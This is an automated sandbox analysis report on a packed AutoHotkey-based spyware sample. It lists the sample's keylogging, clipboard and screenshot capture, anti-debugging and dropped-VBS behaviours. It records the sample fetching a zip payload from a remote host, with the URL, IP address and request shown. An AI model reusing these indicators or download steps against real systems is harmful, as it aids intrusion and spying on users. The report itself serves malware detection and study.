Analysis Report

Overview

General Information

Joe Sandbox Version:	22.0.0
Analysis ID:	521716
Start time:	13:53:57
Joe Sandbox Product:	Cloud
Start date:	03.04.2018
Overall analysis duration:	0h 6m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ss.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal72.spyw.winEXE@4/2@1/2
HCA Information:	Successful, ratio: 95% Number of executed functions: 140 Number of non-executed functions: 121
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
Cookbook Comments:	Adjust boot time Correcting counters for adjusted boot time Adjusted system time to: 21/5/2016 Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): WmiPrvSE.exe, WMIADAP.exe, dllhost.exe Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	72	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample HTTP request are all non existing, likely the sample is no longer working

Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--"

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for unpacked file

Show sources

Source: 2.2.ss.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen
Source: 2.0.ss.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen
Source: 2.1.ss.exe.400000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen

Multi AV Scanner detection for submitted file

Show sources

Source: ss.exe

virustotal: Detection: 31%

Perma Link

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_00408C80 SetWindowsHookExA 0000000D,Function_00004800,00400000,00000000

2_2_00408C80

Contains functionality for read data from the clipboard

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_00404620 GetTickCount,IsClipboardFormatAvailable,GetTickCount,OpenClipboard,OpenClipboard,GetTickCount,OpenClipboard,

2_2_00404620

Contains functionality to record screenshots

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_00437340 GetForegroundWindow,IsIconic,GetWindowRect,ClientToScreen,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,ReleaseDC,SelectObject,DeleteDC,DeleteObject,GetPixel,ReleaseDC,

2_2_00437340

Contains functionality to retrieve information about pressed keystrokes

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_0040EEC0 GetCurrentThreadId,GetKeyboardState,SetKeyboardState,PostMessageA,PostMessageA,PostMessageA,GetModuleHandleA,GetProcAddress,GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetAsyncKeyState,keybd_event,keybd_event,GetAsyncKeyState,keybd_event,GetAsyncKeyState,GetModuleHandleA,GetProcAddress,

2_2_0040EEC0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2008259 ET TROJAN Suspicious User-Agent (AutoHotkey) 192.168.1.16:49188 -> 195.216.243.130:80

Social media urls found in memory data

Show sources

Source: ss.exe

String found in binary or memory: http://www.facebook.com/ucoz.web.builder

Downloads files from webservers via HTTP

Show sources

Source: global traffic

HTTP traffic detected: GET /runings.zip HTTP/1.1User-Agent: AutoHotkeyHost: runing.clan.suCache-Control: no-cache

Found strings which match to known social media urls

Show sources

Source: ss.exe, runings.zip.2.dr	String found in binary or memory: <li><a href="http://www.facebook.com/ucoz.web.builder" target="_blank">Facebook</a></li> equals www.facebook.com (Facebook)
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: <li><a href="https://twitter.com/#!/ucoz_en" target="_blank">Twitter</a></li></ul> equals www.twitter.com (Twitter)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: runing.clan.su

Tries to download non-existing http data (HTTP/1.1 404 Not Found)

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.8.0Date: Tue, 03 Apr 2018 11:56:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=15Data Raw: 31 61 64 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 54 54 50 20 34 30 34 20 52 65 73 6f 75 72 63 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 20 66 6f 6e 74 3a 20 31 32 70 78 2f 32 32 70 78 20 27 56 65 72 64 61 6e 61 27 3b 20 63 6f 6c 6f 72 3a 20 23 36 38 36 38 36 38 3b 7d 0a 6

Urls found in memory or binary data

Show sources

Source: ss.exe	String found in binary or memory: file:///C:/ProgramData/start.vbs
Source: ss.exe	String found in binary or memory: file:///C:/ProgramData/start.vbsC
Source: ss.exe	String found in binary or memory: file:///C:/ProgramData/start.vbsW
Source: ss.exe	String found in binary or memory: http://ahkscript.org
Source: ss.exe	String found in binary or memory: http://ahkscript.orgCould
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://book.ucoz.com
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://counter.yadro.ru/hit;counter1?r
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://faq.ucoz.com/
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://forum.ucoz.com/
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://google.com/search
Source: ss.exe	String found in binary or memory: http://runing.clan.su/runings.zip
Source: ss.exe	String found in binary or memory: http://runing.clan.su/runings.zip-
Source: ss.exe	String found in binary or memory: http://runing.clan.su/runings.zipC:
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://top.ucoz.com/
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://ucoz.com
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://ucoz.com/register/
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://www
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://www.facebook.com/ucoz.web.builder
Source: ss.exe	String found in binary or memory: http://www.ucoz.com/pric
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://www.ucoz.com/pricing/
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://www.ucoz.com/privacy/
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://www.ucoz.com/terms/
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: http://www.ucoz.com/tour/
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: https://ssl
Source: ss.exe, runings.zip.2.dr	String found in binary or memory: https://twitter.com/#

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Show sources

Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00414C40 Shell_NotifyIcon,DeleteObject,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DeleteObject,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyCursor,DestroyCursor,IsWindow,DestroyWindow,DeleteObject,RemoveClipboardFormatListener,ChangeClipboardChain,mciSendStringA,mciSendStringA,mciSendStringA,RtlDeleteCriticalSection,OleUninitialize,		2_2_00414C40
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00415590 AddClipboardFormatListener,PostMessageA,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,		2_2_00415590

Stealing of Sensitive Information:

OS version to string mapping found (often used in BOTs)

Show sources

Source: ss.exe	Binary or memory string: WIN_7
Source: ss.exe	Binary or memory string: WIN_8.1
Source: ss.exe	Binary or memory string: WIN_VISTA
Source: ss.exe	Binary or memory string: ?A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingle1.1.23.07\AutoHotkey.exeWIN32_NTWIN_XPWIN_7WIN_8.1WIN_8WIN_VISTAWIN_2003WIN_2000%04hXcomspecGetCursorInfo0x%IxpPIntStrPtrShortCharInt64DoubleAStrWStrgdi32comctl32-3-4CDecl-2This DllCall requires a prior VarSetCapacity. The program is now unstable and will exit.Pos%sLen%sPos%dLen%dLenMarkpcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCcFfSelectVisCenterUniDescCaseLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameApsapiH
Source: ss.exe	Binary or memory string: WIN_8
Source: ss.exe	Binary or memory string: WIN_XP

Persistence and Installation Behavior:

May use bcdedit to modify the Windows boot settings

Show sources

Source: ss.exe

Binary or memory string: (bcdedit.exe

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_00450930 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,FreeLibrary,DeleteFileA,FreeLibrary,

2_2_00450930

Sample is packed with UPX

Show sources

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_004403A0 SetLastError,DeleteFileA,GetLastError,FindFirstFileA,GetLastError,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,DeleteFileA,GetLastError,FindNextFileA,FindClose,	2_2_004403A0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00472770 __Stoull,_strncpy,FindFirstFileA,FindFirstFileA,FindClose,FindFirstFileA,FindClose,	2_2_00472770
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00452490 GetFileAttributesA,FindFirstFileA,FindClose,	2_2_00452490
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00451070 GetFileAttributesA,FindFirstFileA,FindClose,CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,	2_2_00451070
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_004726E0 __Stoull,FindFirstFileA,FindClose,GetFileAttributesA,	2_2_004726E0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00441700 CreateFileA,GetFileSizeEx,CloseHandle,FindFirstFileA,GetLastError,FindClose,__alldiv,	2_2_00441700
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00451E00 GetFullPathNameA,GetFullPathNameA,GetFullPathNameA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,FindFirstFileA,GetLastError,__wsplitpath,GetLastError,GetTickCount,PeekMessageA,GetTickCount,MoveFileA,DeleteFileA,MoveFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,	2_2_00451E00
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00440F8D FindFirstFileA,GetLastError,	2_2_00440F8D
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0042B115 FindFirstFileA,FindNextFileA,FindClose,	2_2_0042B115
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00440AD7 GetTickCount,GetTickCount,PeekMessageA,GetTickCount,FindNextFileA,FindClose,FindFirstFileA,GetTickCount,PeekMessageA,GetTickCount,FindNextFileA,FindClose,__itow,	2_2_00440AD7
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00440FC0 FindFirstFileA,GetLastError,FindClose,FileTimeToLocalFileTime,	2_2_00440FC0

System Summary:

Potential malicious VBS script found (suspicious strings)

Show sources

Source: C:\Users\user\Desktop\ss.exe

Dropped file: Set xhzhx = CreateObject("Wscript.Shell")

Jump to dropped file

Contains functionality to communicate with device drivers

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_0043D1E0: CreateFileA,DeviceIoControl,CloseHandle,

2_2_0043D1E0

Contains functionality to shutdown / reboot the system

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_00452610 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

2_2_00452610

Detected potential crypto function

Show sources

Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0040136A	2_2_0040136A
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_004566A0	2_2_004566A0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00404B30	2_2_00404B30
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_004161B0	2_2_004161B0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0047C075	2_2_0047C075
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00471240	2_2_00471240
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0040D4E0	2_2_0040D4E0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0043C070	2_2_0043C070
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0047A409	2_2_0047A409
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0047B88D	2_2_0047B88D
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00406CD0	2_2_00406CD0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00483330	2_2_00483330
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00419D60	2_2_00419D60
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0047C2D3	2_2_0047C2D3
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00412570	2_2_00412570
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00421EA0	2_2_00421EA0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0041BF10	2_2_0041BF10
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0048EC20	2_2_0048EC20
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0048F171	2_2_0048F171
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_004902BD	2_2_004902BD
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00437340	2_2_00437340
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_004923AE	2_2_004923AE

Found potential string decryption / allocating functions

Show sources

Source: C:\Users\user\Desktop\ss.exe	Code function: String function: 004847A1 appears 330 times
Source: C:\Users\user\Desktop\ss.exe	Code function: String function: 0042D7A0 appears 168 times
Source: C:\Users\user\Desktop\ss.exe	Code function: String function: 004719A0 appears 48 times
Source: C:\Users\user\Desktop\ss.exe	Code function: String function: 00485220 appears 44 times
Source: C:\Users\user\Desktop\ss.exe	Code function: String function: 00471A30 appears 54 times
Source: C:\Users\user\Desktop\ss.exe	Code function: String function: 0042D4F0 appears 52 times

PE file contains strange resources

Show sources

Source: ss.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Reads the hosts file

Show sources

Source: C:\Users\user\Desktop\ss.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\ss.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample file is different than original file name gathered from version info

Show sources

Source: ss.exe	Binary or memory string: originalfilename vs ss.exe
Source: ss.exe	Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs ss.exe
Source: ss.exe	Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs ss.exe
Source: ss.exe	Binary or memory string: OriginalFilenamewshtcpip.dll.muij% vs ss.exe
Source: ss.exe	Binary or memory string: OriginalFilenamewscript.exe` vs ss.exe
Source: ss.exe	Binary or memory string: OriginalFilenamewship6.dll.muij% vs ss.exe
Source: ss.exe	Binary or memory string: System.OriginalFileName vs ss.exe

PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)

Show sources

Source: ss.exe

Static PE information: Section: UPX1 ZLIB complexity 0.994250704509

Classification label

Show sources

Source: classification engine

Classification label: mal72.spyw.winEXE@4/2@1/2

Contains functionality for error logging

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_0042E250 CreateProcessA,CloseHandle,CloseHandle,GetLastError,SetCurrentDirectoryA,GetFileAttributesA,SetCurrentDirectoryA,ShellExecuteEx,GetModuleHandleA,GetProcAddress,GetProcessId,GetLastError,FormatMessageA,

2_2_0042E250

Contains functionality to adjust token privileges (e.g. debug / backup)

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_00452610 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,

2_2_00452610

Contains functionality to check free disk space

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_0043CE10 _strncpy,GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,

2_2_0043CE10

Contains functionality to instantiate COM classes

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_00451070 GetFileAttributesA,FindFirstFileA,FindClose,CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,

2_2_00451070

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_00440630 CreateFileA,__mbsupr,FindResourceA,LoadResource,LockResource,SizeofResource,WriteFile,CloseHandle,

2_2_00440630

Executes visual basic scripts

Show sources

Source: unknown

Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\start.vbs'

Might use command line arguments

Show sources

Source: C:\Users\user\Desktop\ss.exe	Command line argument: /restart	2_2_00403AF0
Source: C:\Users\user\Desktop\ss.exe	Command line argument: /force	2_2_00403AF0
Source: C:\Users\user\Desktop\ss.exe	Command line argument: /ErrorStdOut	2_2_00403AF0
Source: C:\Users\user\Desktop\ss.exe	Command line argument: AutoHotkey	2_2_00403AF0
Source: C:\Users\user\Desktop\ss.exe	Command line argument: AutoHotkey	2_2_00403AF0
Source: C:\Users\user\Desktop\ss.exe	Command line argument: Clipboard	2_2_00403AF0
Source: C:\Users\user\Desktop\ss.exe	Command line argument: Clipboard	2_2_00403AF0

Reads ini files

Show sources

Source: C:\Users\user\Desktop\ss.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Reads software policies

Show sources

Source: C:\Users\user\Desktop\ss.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Sample is known by Antivirus (Virustotal or Metascan)

Show sources

Source: ss.exe

Virustotal: hash found

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\ss.exe 'C:\Users\user\Desktop\ss.exe'
Source: unknown	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\start.vbs'
Source: C:\Users\user\Desktop\ss.exe	Process created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\ProgramData\start.vbs'	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to launch a program with higher privileges

Show sources

Source: C:\Users\user\Desktop\ss.exe

2_2_0042E250

Contains functionality to simulate keystroke presses

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_00410450 keybd_event,

2_2_00410450

Contains functionality to simulate mouse events

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_0040FE10 GetAsyncKeyState,GetSystemMetrics,GetSystemMetrics,GetCursorPos,WindowFromPoint,GetWindowThreadProcessId,SendMessageA,mouse_event,mouse_event,

2_2_0040FE10

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: ss.exe	Binary or memory string: regk-hookm-hook2-hooksjoypollPART%i-%i(no)%s%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSizeMBLoopF
Source: ss.exe	Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidgroupclass%s%uProgram ManagerError text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: ss.exe	Binary or memory string: Program Manager
Source: ss.exe	Binary or memory string: Shell_TrayWnd

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Users\user\Desktop\ss.exe

System information queried: KernelDebuggerInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_0048B884 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

2_2_0048B884

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\ss.exe

2_2_00450930

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\user\Desktop\ss.exe

Code function: 2_2_00491AAE GetProcessHeap,RtlAllocateHeap,__setmode_nolock,__setmode_nolock,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,

2_2_00491AAE

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0048D652 SetUnhandledExceptionFilter,		2_2_0048D652
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0048B884 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		2_2_0048B884

Malware Analysis System Evasion:

Found WSH timer for Javascript or VBS script (likely evasive script)

Show sources

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Users\user\Desktop\ss.exe

Window / User API: foregroundWindowGot 794

Jump to behavior

Found large amount of non-executed APIs

Show sources

Source: C:\Users\user\Desktop\ss.exe

API coverage: 2.1 %

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_004403A0 SetLastError,DeleteFileA,GetLastError,FindFirstFileA,GetLastError,GetTickCount,GetTickCount,PeekMessageA,GetTickCount,DeleteFileA,GetLastError,FindNextFileA,FindClose,	2_2_004403A0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00472770 __Stoull,_strncpy,FindFirstFileA,FindFirstFileA,FindClose,FindFirstFileA,FindClose,	2_2_00472770
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00452490 GetFileAttributesA,FindFirstFileA,FindClose,	2_2_00452490
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00451070 GetFileAttributesA,FindFirstFileA,FindClose,CoInitialize,CoCreateInstance,MultiByteToWideChar,CoUninitialize,	2_2_00451070
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_004726E0 __Stoull,FindFirstFileA,FindClose,GetFileAttributesA,	2_2_004726E0
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00441700 CreateFileA,GetFileSizeEx,CloseHandle,FindFirstFileA,GetLastError,FindClose,__alldiv,	2_2_00441700
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00451E00 GetFullPathNameA,GetFullPathNameA,GetFullPathNameA,GetFileAttributesA,GetFileAttributesA,GetFileAttributesA,FindFirstFileA,GetLastError,__wsplitpath,GetLastError,GetTickCount,PeekMessageA,GetTickCount,MoveFileA,DeleteFileA,MoveFileA,GetLastError,CopyFileA,GetLastError,FindNextFileA,FindClose,	2_2_00451E00
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00440F8D FindFirstFileA,GetLastError,	2_2_00440F8D
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_0042B115 FindFirstFileA,FindNextFileA,FindClose,	2_2_0042B115
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00440AD7 GetTickCount,GetTickCount,PeekMessageA,GetTickCount,FindNextFileA,FindClose,FindFirstFileA,GetTickCount,PeekMessageA,GetTickCount,FindNextFileA,FindClose,__itow,	2_2_00440AD7
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00440FC0 FindFirstFileA,GetLastError,FindClose,FileTimeToLocalFileTime,	2_2_00440FC0

Hooking and other Techniques for Hiding and Protection:

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Show sources

Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00462A00 SetWindowTextA,IsZoomed,IsIconic,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,MulDiv,MulDiv,ShowWindow,IsIconic,GetWindowLongA,GetWindowRect,MapWindowPoints,GetWindowLongA,GetWindowRect,GetWindowLongA,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongA,GetWindowLongA,GetWindowLongA,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoA,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,	2_2_00462A00
Source: C:\Users\user\Desktop\ss.exe	Code function: 2_2_00462A00 SetWindowTextA,IsZoomed,IsIconic,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,__Stoull,MulDiv,MulDiv,ShowWindow,IsIconic,GetWindowLongA,GetWindowRect,MapWindowPoints,GetWindowLongA,GetWindowRect,GetWindowLongA,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongA,GetWindowLongA,GetWindowLongA,GetMenu,AdjustWindowRectEx,GetSystemMetrics,GetSystemMetrics,SystemParametersInfoA,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetAncestor,GetForegroundWindow,GetFocus,GetDlgCtrlID,GetDlgCtrlID,GetParent,GetDlgCtrlID,UpdateWindow,GetDlgCtrlID,SetFocus,	2_2_00462A00
